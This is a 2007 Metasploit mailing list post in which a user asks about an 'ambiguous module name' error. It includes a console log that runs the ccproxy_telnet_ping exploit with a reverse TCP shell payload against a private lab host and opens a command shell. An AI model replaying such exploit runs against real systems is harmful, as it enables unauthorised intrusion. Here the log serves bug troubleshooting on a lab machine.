Metasploit mailing list archives

Module name is ambiguous


From: patrick at aushack.com (Patrick Webster)
Date: Mon, 20 Aug 2007 22:43:20 +1000

Hi,

Can anyone shed any light on this error? I couldn't find any references in
the MSF code, so it may be a ruby thing?

"[-] The name windows/proxy/ccproxy_telnet_ping is ambiguous."

For example:

Please use MSFUpdate to obtain the latest patches and exploits!


[*] Starting the Metasploit Framework...

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ msf v3.1-dev
+ -- --=[ 228 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
       =[ 40 aux

msf > use exploit/windows/proxy/ccproxy_telnet_ping
msf exploit(ccproxy_telnet_ping) > set RHOST 192.168.195.131
RHOST => 192.168.195.131
msf exploit(ccproxy_telnet_ping) > rcheck
[*] The target appears to be vulnerable.
msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ccproxy_telnet_ping) > set LHOST 192.168.195.1
LHOST => 192.168.195.1
msf exploit(ccproxy_telnet_ping) > rexploit
[-] Exploit failed: A target has not been selected.
msf exploit(ccproxy_telnet_ping) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 Pro All - English
   1   Windows 2000 Pro All - Italian
   2   Windows 2000 Pro All - French
   3   Windows XP SP0/1 - English
   4   Windows XP SP2 - English


msf exploit(ccproxy_telnet_ping) > set TARGET 4
TARGET => 4
msf exploit(ccproxy_telnet_ping) > rexploit
[*] Started reverse handler
[*] Trying target Windows XP SP2 - English on host 192.168.195.131:23...
[*] Exploit completed, but no session was created.
msf exploit(ccproxy_telnet_ping) > rexploit
[*] Started reverse handler
[*] Trying target Windows XP SP2 - English on host 192.168.195.131:23...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.195.1:4444 ->
192.168.195.131:1134)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\admin\Desktop>
Background session 1? [y/N]  y
msf exploit(ccproxy_telnet_ping) > use
exploit/windows/proxy/ccproxy_telnet_ping
[-] The name windows/proxy/ccproxy_telnet_ping is ambiguous.
msf exploit(ccproxy_telnet_ping) > use
exploit/windows/proxy/ccproxy_telnet_ping
[-] The name windows/proxy/ccproxy_telnet_ping is ambiguous.
msf exploit(ccproxy_telnet_ping) > back
msf > use exploit/windows/proxy/ccproxy_telnet_ping
[-] The name windows/proxy/ccproxy_telnet_ping is ambiguous.
msf > use windows/proxy/ccproxy_telnet_ping
msf exploit(ccproxy_telnet_ping) >

TIA,
-Patrick
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070820/0842d252/attachment.htm>


Current thread: